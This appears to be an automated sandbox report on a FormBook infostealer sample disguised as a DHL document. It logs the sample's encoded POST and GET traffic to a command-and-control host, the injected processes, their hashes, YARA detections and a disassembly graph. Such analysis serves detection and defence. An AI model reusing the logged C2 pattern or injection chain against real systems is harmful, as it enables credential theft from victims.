                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  23192.168.2.549998217.196.55.202804568C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 7, 2024 07:03:52.489723921 CET1823OUTPOST /fo8o/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.empowermedeco.com
                                                                                  Origin: http://www.empowermedeco.com
                                                                                  Cache-Control: no-cache
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 1239
                                                                                  Referer: http://www.empowermedeco.com/fo8o/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Data Raw: 6b 30 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 79 4b 34 47 37 72 64 4f 56 77 6d 61 71 32 63 61 71 55 77 61 2b 68 45 47 78 5a 33 42 77 6d 75 48 5a 74 6e 65 53 4e 70 43 76 36 74 64 7a 2f 53 71 67 46 51 4a 69 6a 43 63 36 51 41 65 63 2b 32 37 6b 68 2f 48 48 4a 4b 4a 56 56 56 78 71 66 58 4f 71 52 49 54 70 6a 50 5a 42 4b 70 59 30 76 6a 45 38 31 2b 77 6a 6b 67 44 63 69 75 50 6c 52 57 33 73 57 31 47 6d 73 42 74 73 4f 41 68 41 68 55 4f 70 6d 67 52 49 45 30 57 52 76 49 6b 75 69 70 74 4a 74 68 6a 50 6c 68 6c 4f 2b 6a 35 5a 54 6b 50 42 6f 68 4a 7a 66 57 5a 6e 4e 6e 31 33 44 6b 46 66 7a 44 2f 49 65 45 6e 42 33 32 7a 51 2f 57 4b 65 45 72 65 54 79 34 78 6b 73 63 6f 4b 41 54 48 37 53 44 6c 42 70 58 2b 39 48 73 46 75 43 6e 4a 53 48 68 41 67 54 68 49 79 76 52 2b 42 47 43 61 64 30 75 4c 6f 70 32 6c 41 6f 34 6d 4f 65 5a 6a 43 72 67 79 71 76 4c 71 5a 7a 4f 30 4f 5a 6e 37 68 75 35 4b 34 66 37 2f 45 38 33 6d 73 46 76 45 61 79 51 6b 63 48 4c 39 78 42 44 7a 54 6a 52 77 43 4a 62 76 47 36 55 67 47 4c 4c 38 30 33 65 56 38 37 [TRUNCATED]
                                                                                  Data Ascii: k0=rzPx9WPPN4oHTyK4G7rdOVwmaq2caqUwa+hEGxZ3BwmuHZtneSNpCv6tdz/SqgFQJijCc6QAec+27kh/HHJKJVVVxqfXOqRITpjPZBKpY0vjE81+wjkgDciuPlRW3sW1GmsBtsOAhAhUOpmgRIE0WRvIkuiptJthjPlhlO+j5ZTkPBohJzfWZnNn13DkFfzD/IeEnB32zQ/WKeEreTy4xkscoKATH7SDlBpX+9HsFuCnJSHhAgThIyvR+BGCad0uLop2lAo4mOeZjCrgyqvLqZzO0OZn7hu5K4f7/E83msFvEayQkcHL9xBDzTjRwCJbvG6UgGLL803eV87ixRjkXYPl2e5FDOjxQX427zjUnUZjVjptuwgpmwelJA19UL29C3XJf4vPIK6ATY0nVxKPNo2Z4DLsRiX3Lp0HW7TCxYtU4ZQ0Z76PIyBxrpQaYANQ2s2AzdyARGRFQe8cDa88hWKqJV2mMu8MmqcFpInCSSLUBZtWl9VprTKhZgTSWvD2RlFYmMA7+Lb5PGcmVjWkVmxFmylchMU6MdzfC5pclVzpVEPCUK6M4jzo7tIG1s1O1ak4ykjdpyQ9xtDHHQA93zk4EKjkjKhMy49kY9AeVOS1QFlhCJ7NWY+WS6g/g4IfKQ6nMXtOfp1me9SuV4isExiAMQadOxuYpDdpEc9j4BkSGpFubTofCJvLdpYJtd10AQEJ3+cC2GenvzPy0w2VUmnJZV39NWexe2UiH1QCirMz0q9LbeNXooO6lJV/pgXoootP/t8LClJ0Bg/pKgJuDs76xxp8mEJB3/aVWJ6Jof4nmtHkIlH/KY8jN+pyVZl5f9G2CT0FNl7QuENSPqexlnbd1z7d6vtPZoC+knFtqLdqVS33jhJj4f5JK1m3UuFc+glIDn+MQbeUwvRUTjLfJ2b3gUIqRnLKFq+crb6I2ceLGKWUvw13hsdGwo7rTrDG6r3waLOwS3BN29x731ATO6CO8B0CiGE7uVORxZRW2Yk9L4cQj [TRUNCATED]
                                                                                  Dec 7, 2024 07:03:53.681307077 CET1085INHTTP/1.1 301 Moved Permanently
                                                                                  Connection: close
                                                                                  content-type: text/html
                                                                                  content-length: 795
                                                                                  date: Sat, 07 Dec 2024 06:03:53 GMT
                                                                                  server: LiteSpeed
                                                                                  location: https://www.empowermedeco.com/fo8o/
                                                                                  platform: hostinger
                                                                                  panel: hpanel
                                                                                  content-security-policy: upgrade-insecure-requests
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  24192.168.2.549999217.196.55.202804568C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 7, 2024 07:03:55.187002897 CET523OUTGET /fo8o/?k0=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKZS1b6NbCHbQEZbfQfUSvJErRJZB76jwKK/37UG0r+NzcRQ==&hh=cJ5D4t7Hz6GD3fB HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Host: www.empowermedeco.com
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Dec 7, 2024 07:03:56.384815931 CET1236INHTTP/1.1 301 Moved Permanently
                                                                                  Connection: close
                                                                                  content-type: text/html
                                                                                  content-length: 795
                                                                                  date: Sat, 07 Dec 2024 06:03:56 GMT
                                                                                  server: LiteSpeed
                                                                                  location: https://www.empowermedeco.com/fo8o/?k0=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKZS1b6NbCHbQEZbfQfUSvJErRJZB76jwKK/37UG0r+NzcRQ==&hh=cJ5D4t7Hz6GD3fB
                                                                                  platform: hostinger
                                                                                  panel: hpanel
                                                                                  content-security-policy: upgrade-insecure-requests
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></ht
                                                                                  Dec 7, 2024 07:03:56.384907007 CET4INData Raw: 6d 6c 3e 0a
                                                                                  Data Ascii: ml>


                                                                                  Statistics

                                                                                  CPU Usage

                                                                                  Click to jump to process

                                                                                  Memory Usage

                                                                                  Click to jump to process

                                                                                  High Level Behavior Distribution

                                                                                  Click to dive into process behavior distribution

                                                                                  Behavior

                                                                                  Click to jump to process

                                                                                  System Behavior

                                                                                  General

                                                                                  Target ID:0
                                                                                  Start time:00:59:56
                                                                                  Start date:07/12/2024
                                                                                  Path:C:\Users\user\Desktop\DHL 40312052024.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\DHL 40312052024.exe"
                                                                                  Imagebase:0x7b0000
                                                                                  File size:1'202'688 bytes
                                                                                  MD5 hash:76D2944F234154FA8D4C251EC4C621BE
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:2
                                                                                  Start time:00:59:59
                                                                                  Start date:07/12/2024
                                                                                  Path:C:\Windows\SysWOW64\svchost.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\DHL 40312052024.exe"
                                                                                  Imagebase:0xeb0000
                                                                                  File size:46'504 bytes
                                                                                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2201456108.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2201456108.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2202258982.0000000003650000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2202258982.0000000003650000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2202388210.0000000004090000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2202388210.0000000004090000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:3
                                                                                  Start time:01:00:06
                                                                                  Start date:07/12/2024
                                                                                  Path:C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe"
                                                                                  Imagebase:0x5a0000
                                                                                  File size:140'800 bytes
                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4473431930.0000000003090000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4473431930.0000000003090000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                  Reputation:high
                                                                                  Has exited:false

                                                                                  General

                                                                                  Target ID:4
                                                                                  Start time:01:00:08
                                                                                  Start date:07/12/2024
                                                                                  Path:C:\Windows\SysWOW64\netbtugc.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\SysWOW64\netbtugc.exe"
                                                                                  Imagebase:0x760000
                                                                                  File size:22'016 bytes
                                                                                  MD5 hash:EE7BBA75B36D54F9E420EB6EE960D146
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4472233099.0000000000660000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4472233099.0000000000660000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4473466571.0000000002BB0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4473466571.0000000002BB0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4473348288.0000000002A30000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4473348288.0000000002A30000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                  Reputation:moderate
                                                                                  Has exited:false

                                                                                  General

                                                                                  Target ID:6
                                                                                  Start time:01:00:22
                                                                                  Start date:07/12/2024
                                                                                  Path:C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe"
                                                                                  Imagebase:0x5a0000
                                                                                  File size:140'800 bytes
                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4475242478.0000000004E70000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4475242478.0000000004E70000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                  Reputation:high
                                                                                  Has exited:false

                                                                                  General

                                                                                  Target ID:7
                                                                                  Start time:01:00:34
                                                                                  Start date:07/12/2024
                                                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                  Imagebase:0x7ff79f9e0000
                                                                                  File size:676'768 bytes
                                                                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Disassembly

                                                                                  Reset < >

                                                                                    Execution Graph

                                                                                    Execution Coverage:3.6%
                                                                                    Dynamic/Decrypted Code Coverage:0.4%
                                                                                    Signature Coverage:8.7%
                                                                                    Total number of Nodes:2000
                                                                                    Total number of Limit Nodes:60
                                                                                    execution_graph 101568 7f416f 101572 805fe6 101568->101572 101570 7f417a 101571 805fe6 85 API calls 101570->101571 101571->101570 101573 806020 101572->101573 101578 805ff3 101572->101578 101573->101570 101574 806022 101611 7b9328 84 API calls Mailbox 101574->101611 101576 806027 101583 7b9837 101576->101583 101578->101573 101578->101574 101578->101576 101581 80601a 101578->101581 101610 7b95a0 59 API calls _wcsstr 101581->101610 101584 7b9851 101583->101584 101592 7b984b 101583->101592 101585 7ef5d3 __i64tow 101584->101585 101586 7b9899 101584->101586 101587 7ef4da 101584->101587 101589 7b9857 __itow 101584->101589 101626 7d3698 83 API calls 3 library calls 101586->101626 101594 7d0db6 Mailbox 59 API calls 101587->101594 101599 7ef552 Mailbox _wcscpy 101587->101599 101612 7d0db6 101589->101612 101601 7b7b2e 101592->101601 101593 7b9871 101593->101592 101622 7b7de1 101593->101622 101596 7ef51f 101594->101596 101597 7d0db6 Mailbox 59 API calls 101596->101597 101598 7ef545 101597->101598 101598->101599 101600 7b7de1 59 API calls 101598->101600 101627 7d3698 83 API calls 3 library calls 101599->101627 101600->101599 101602 7eec6b 101601->101602 101603 7b7b40 101601->101603 101662 807bdb 59 API calls _memmove 101602->101662 101656 7b7a51 101603->101656 101606 7b7b4c 101606->101573 101607 7eec75 101663 7b8047 101607->101663 101609 7eec7d Mailbox 101610->101573 101611->101576 101614 7d0dbe 101612->101614 101615 7d0dd8 101614->101615 101617 7d0ddc std::exception::exception 101614->101617 101628 7d571c 101614->101628 101645 7d33a1 DecodePointer 101614->101645 101615->101593 101646 7d859b RaiseException 101617->101646 101619 7d0e06 101647 7d84d1 58 API calls _free 101619->101647 101621 7d0e18 101621->101593 101623 7b7df0 __wsetenvp _memmove 101622->101623 101624 7d0db6 Mailbox 59 API calls 101623->101624 101625 7b7e2e 101624->101625 101625->101592 101626->101589 101627->101585 101629 7d5797 101628->101629 101633 7d5728 101628->101633 101654 7d33a1 DecodePointer 101629->101654 101631 7d579d 101655 7d8b28 58 API calls __getptd_noexit 101631->101655 101635 7d575b RtlAllocateHeap 101633->101635 101638 7d5733 101633->101638 101639 7d5783 101633->101639 101643 7d5781 101633->101643 101651 7d33a1 DecodePointer 101633->101651 101635->101633 101636 7d578f 101635->101636 101636->101614 101638->101633 101648 7da16b 58 API calls 2 library calls 101638->101648 101649 7da1c8 58 API calls 8 library calls 101638->101649 101650 7d309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 101638->101650 101652 7d8b28 58 API calls __getptd_noexit 101639->101652 101653 7d8b28 58 API calls __getptd_noexit 101643->101653 101645->101614 101646->101619 101647->101621 101648->101638 101649->101638 101651->101633 101652->101643 101653->101636 101654->101631 101655->101636 101657 7b7a5f 101656->101657 101661 7b7a85 _memmove 101656->101661 101658 7d0db6 Mailbox 59 API calls 101657->101658 101657->101661 101659 7b7ad4 101658->101659 101660 7d0db6 Mailbox 59 API calls 101659->101660 101660->101661 101661->101606 101662->101607 101664 7b805a 101663->101664 101665 7b8052 101663->101665 101664->101609 101667 7b7f77 59 API calls 2 library calls 101665->101667 101667->101664 101668 149c9e8 101682 149a638 101668->101682 101670 149caa9 101685 149c8d8 101670->101685 101688 149dad8 GetPEB 101682->101688 101684 149acc3 101684->101670 101686 149c8e1 Sleep 101685->101686 101687 149c8ef 101686->101687 101689 149db02 101688->101689 101689->101684 101690 7efdfc 101729 7bab30 Mailbox _memmove 101690->101729 101696 7bb525 101781 819e4a 89 API calls 4 library calls 101696->101781 101697 7f0055 101780 819e4a 89 API calls 4 library calls 101697->101780 101699 7d0db6 59 API calls Mailbox 101719 7b9f37 Mailbox 101699->101719 101702 7bb475 101707 7b8047 59 API calls 101702->101707 101703 7b8047 59 API calls 101703->101719 101704 7f0064 101705 7bb47a 101705->101697 101717 7f09e5 101705->101717 101711 7ba057 101707->101711 101710 7b7667 59 API calls 101710->101719 101712 806e8f 59 API calls 101712->101719 101713 7b7de1 59 API calls 101713->101729 101714 7f09d6 101786 819e4a 89 API calls 4 library calls 101714->101786 101716 7d2d40 67 API calls __cinit 101716->101719 101787 819e4a 89 API calls 4 library calls 101717->101787 101718 7ba55a 101785 819e4a 89 API calls 4 library calls 101718->101785 101719->101697 101719->101699 101719->101702 101719->101703 101719->101705 101719->101710 101719->101711 101719->101712 101719->101714 101719->101716 101719->101718 101745 7bc8c0 331 API calls 2 library calls 101719->101745 101746 7bb900 60 API calls Mailbox 101719->101746 101722 7d0db6 59 API calls Mailbox 101722->101729 101723 7bb2b6 101774 7bf6a3 331 API calls 101723->101774 101726 7f086a 101783 7b9c90 59 API calls Mailbox 101726->101783 101728 7f0878 101784 819e4a 89 API calls 4 library calls 101728->101784 101729->101696 101729->101711 101729->101713 101729->101719 101729->101722 101729->101723 101729->101726 101729->101728 101731 7f085c 101729->101731 101732 7bb21c 101729->101732 101735 806e8f 59 API calls 101729->101735 101739 82df23 101729->101739 101742 82df37 101729->101742 101747 7b9ea0 101729->101747 101771 7b9c90 59 API calls Mailbox 101729->101771 101775 82c193 85 API calls 2 library calls 101729->101775 101776 82c2e0 96 API calls Mailbox 101729->101776 101777 817956 59 API calls Mailbox 101729->101777 101778 82bc6b 331 API calls Mailbox 101729->101778 101779 80617e 59 API calls Mailbox 101729->101779 101731->101711 101782 80617e 59 API calls Mailbox 101731->101782 101772 7b9d3c 60 API calls Mailbox 101732->101772 101734 7bb22d 101773 7b9d3c 60 API calls Mailbox 101734->101773 101735->101729 101788 82cadd 101739->101788 101741 82df33 101741->101729 101743 82cadd 130 API calls 101742->101743 101744 82df47 101743->101744 101744->101729 101745->101719 101746->101719 101748 7b9ebf 101747->101748 101764 7b9eed Mailbox 101747->101764 101749 7d0db6 Mailbox 59 API calls 101748->101749 101749->101764 101750 7d2d40 67 API calls __cinit 101750->101764 101751 7bb475 101752 7b8047 59 API calls 101751->101752 101765 7ba057 101752->101765 101753 7bb47a 101754 7f0055 101753->101754 101770 7f09e5 101753->101770 101931 819e4a 89 API calls 4 library calls 101754->101931 101758 7d0db6 59 API calls Mailbox 101758->101764 101759 7f0064 101759->101729 101761 7b8047 59 API calls 101761->101764 101763 7b7667 59 API calls 101763->101764 101764->101750 101764->101751 101764->101753 101764->101754 101764->101758 101764->101761 101764->101763 101764->101765 101766 806e8f 59 API calls 101764->101766 101767 7f09d6 101764->101767 101769 7ba55a 101764->101769 101929 7bc8c0 331 API calls 2 library calls 101764->101929 101930 7bb900 60 API calls Mailbox 101764->101930 101765->101729 101766->101764 101933 819e4a 89 API calls 4 library calls 101767->101933 101932 819e4a 89 API calls 4 library calls 101769->101932 101934 819e4a 89 API calls 4 library calls 101770->101934 101771->101729 101772->101734 101773->101723 101774->101696 101775->101729 101776->101729 101777->101729 101778->101729 101779->101729 101780->101704 101781->101731 101782->101711 101783->101731 101784->101731 101785->101711 101786->101717 101787->101711 101789 7b9837 84 API calls 101788->101789 101790 82cb1a 101789->101790 101814 82cb61 Mailbox 101790->101814 101826 82d7a5 101790->101826 101792 82cdb9 101793 82cf2e 101792->101793 101797 82cdc7 101792->101797 101876 82d8c8 92 API calls Mailbox 101793->101876 101796 82cf3d 101796->101797 101799 82cf49 101796->101799 101839 82c96e 101797->101839 101798 7b9837 84 API calls 101816 82cbb2 Mailbox 101798->101816 101799->101814 101804 82ce00 101854 7d0c08 101804->101854 101807 82ce33 101861 7b92ce 101807->101861 101808 82ce1a 101860 819e4a 89 API calls 4 library calls 101808->101860 101811 82ce25 GetCurrentProcess TerminateProcess 101811->101807 101814->101741 101816->101792 101816->101798 101816->101814 101858 82fbce 59 API calls 2 library calls 101816->101858 101859 82cfdf 61 API calls 2 library calls 101816->101859 101818 82cfa4 101818->101814 101822 82cfb8 FreeLibrary 101818->101822 101819 82ce6b 101873 82d649 107 API calls _free 101819->101873 101822->101814 101824 82ce7c 101824->101818 101874 7b8d40 59 API calls Mailbox 101824->101874 101875 7b9d3c 60 API calls Mailbox 101824->101875 101877 82d649 107 API calls _free 101824->101877 101878 7b7e4f 101826->101878 101828 82d7c0 CharLowerBuffW 101882 80f167 